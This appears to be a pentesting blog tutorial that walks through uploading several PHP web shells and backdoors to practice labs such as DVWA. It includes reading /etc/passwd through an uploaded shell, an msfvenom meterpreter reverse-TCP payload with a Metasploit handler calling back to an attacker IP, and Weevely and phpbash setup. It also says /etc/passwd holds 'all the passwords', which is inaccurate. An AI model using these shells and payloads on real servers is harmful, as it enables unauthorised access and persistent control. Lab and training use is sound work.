This post will describe the various PHP
web Shell uploading technique to take unauthorized access of the web server by
injecting malicious piece of code that are written in PHP.
Table of content
- Introduction of PHP Web shells
- Inbuilt Kali’s web shells
- simple backdoor.php
- qsd-php backdoor web shell
- php-reverse-shell.php
- Using MSF venom
- Weevely php web shell
- Php_bash web shell
Requirements
Attacker: Kali Linux
Target: Web for Pentester, DVWA
Introduction of PHP Web Shells
Web shells are the scripts which are coded
in many languages like PHP, Python, ASP, Perl and so on which further use as
backdoor for illegitimate access in any server by uploading it on a web server.
The attacker can then directly perform the
read and write operation once the backdoor is uploaded to a destination, you
can edit any file of delete the server file. Today we are going to explore all
kinds of php web shells what-so-ever are available in kali Linux and so on. So,
let’s get started.
Kali Linux has inbuilt PHP Scripts for
utilizing them as backdoor to assist Pen-testing work. They are stored inside /usr/share/webshells/php
and a pen-tester can directory make use of them without wasting time in
writing PHP code for malicious script.
·
simple backdoor.php
·
qsd-php backdoor web shell
·
php-reverse-shell.php
Simplebackdoor.php shell
Simple-backdoor.php is a kind of web shell
that can generate a remote code execution once injected in the web server and
script made by “John Troon”. It is already accessible in Kali in
the/usr/share/web shells/php folder as shown in the pic below and after that we
will run ls -al command to check the permissions given to the files.
cd /usr/share/webshells/php
ls -al
Now you must discover a way to upload a
shell in your application. As we have doing all this Web for Pentesters, so we
will first try to upload here simple backdoor php shell which is already
available in kali and click on send file to upload the shell.
As you can see, we have successfully
uploaded the malicious php file and received the hyperlink for uploaded file.
Thus, we try to access simple-backdoor.php
and obtain following output. As we can observe that here “cmd=cat+/etc/passwd”
is a clear indication for Remote code execution.
So, let’s try and run cat+/etc/passwd to
retrieve all the passwords of the server.
cmd=cat+/etc/passwd
As result we have extracted all records of
passwd file, hence we can execute any command such as ls, cp and so on therefore
we can obtain web shell by exploiting REC.
An exploit of a web shell generally considered
as backdoor that enables an attacker to access and control a server remotely
and qsd-php backdoor shell is a kind of backdoor which provide a platform for
executing system command and the wonderful script made by “Daniel Berliner”.
As you can see, we have uploaded the
qsd-php-backdoor.php file successfully.
Then try accessing qsd-php-backdoor.php as
you did in the previous step and you will find something as shown in the image
below. Here you can perform directory traversal and you can also access the Web
Server directory directly by entering the command and clicking on the go
button.
As you can observe we have accessed the
current directory directly without executing any system command.
We can also execute arbitrary system
command since this backdoor provides a platform to execute shell command such
cat/etc/passwd, ls -al and much more. We can also run two commands
simultaneously and see the result.
As you can see that we have got the result
successfully.
Php-reverse shell
Now its turn to move towards our next php
web shell which is php-reverse-shell.php which will open an outbound TCP
connection from the webserver to a host and script made by “pentestmonkey”. A
shell will be attached to the TCP connection (reverse TCP connection). You can
run interactive programs such as telnet, ssh etc with this script. It is
different from the other Web shells script, through which you can send a single
command and then return the output.
For this we need to open this script
through nano
nano php-reverse-shell.php
Here we need to give the LISTEN_IP (Kali
Linux) where we want the connection and LISTEN_PORT number can be set any.
Now
we need to upload this web shell in order to get the reverse connection. So, we
will upload the malicious file and on other hand start netcat listener inside a
new terminal.
We can see that it is uploaded successfully.
Now as soon as you will execute the
uploaded file and If all went well, then, the web server should have thrown
back a reverse shell to your netcat listener. And you can verify that we have
got the shell successfully.
PHP Backdoor using MSFvenom
We can also generate a php web shell
with the help of msfvenom. We, therefore, write use msfvenom following command
for generating malicious php code in raw format.
msfveom -p php/meterpreter/reverse_tcp
lhost=192.168.1.106 lport=4444 R
Then copy the code and save it by the
name of meter.php
Now we will upload this malicious shell in
DVWA lab to get the reverse connection. Now you can see the "meter.php
successfully uploaded" message from the screenshot, meaning that our php backdoor
is effectively uploaded.
In order to execute the shell, the we will
open the URL of DVWA.
Simultaneously we will start multi handler
where we will get the meterpreter shell and we will run the following commands
where we need to specify the lhost and lport to get the reverse connection.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.106
set lport 4444
exploit
sysinfo
As soon as you will explore the uploaded
path and execute the backdoor, it will give you a meterpreter session.
Weevely Shell
Weevely is a stealthy PHP internet shell
which simulates the link to Telnet and is designed for remote server
administration and penetration testing. It can be used as a stealth backdoor a
web shell to manage legit web accounts, it is an essential tool for web
application post exploitation. We can generate a PHP backdoor protected with
the password.
Open the terminal and type weevely to
generate a php backdoor and also set a password as in our case we have taken “raj123”
and save this web shell as weevely.php
weevely generate raj123 weevely.php
Now upload this web shell at the target
location as in our case we have uploaded it at Web for pen testers and we will
open the URL in the browse to execute the web shell.
Type the following instruction to initiate
the web server attack and put a copied URL into the Weevely command using
password raj123 and you can see that we have got the victim shell through
weevely. We can verify this by id command.
id
You can also check all the functionality of
weevely through help command.
PHPbash shell
Phpbash is an internet shell that is
autonomous, semi-interactive. We are going to download it from GitHub and then
we will go inside the directory phpbash and execute ls -al command to check the
available files.
git clone https://github.com/Arrexel/phpbash.git
cd phpbash/
ls -al
So inside phpbash, we found a php script
named “phpbash.php”, upload this script at your target location.
Now we will upload this web shell in DVWA
lab and we can see the message that it is uploaded successfully.
Going ahead; we will open the URL to
execute the shell.
Here our phpbash malicious file is
executed and given the web shell. The benefit of the phpbash is that it doesn’t
required any type of listener such as netcat because it has inbuilt bash shell
that you can observe from the given image.
As result we have bash shell of www-data
and we can execute system command directly through this platform.
So, this way we have explored and performed
numerous ways to get the web shell through php web shells; which you can find
under this single article.
0 comments:
Post a Comment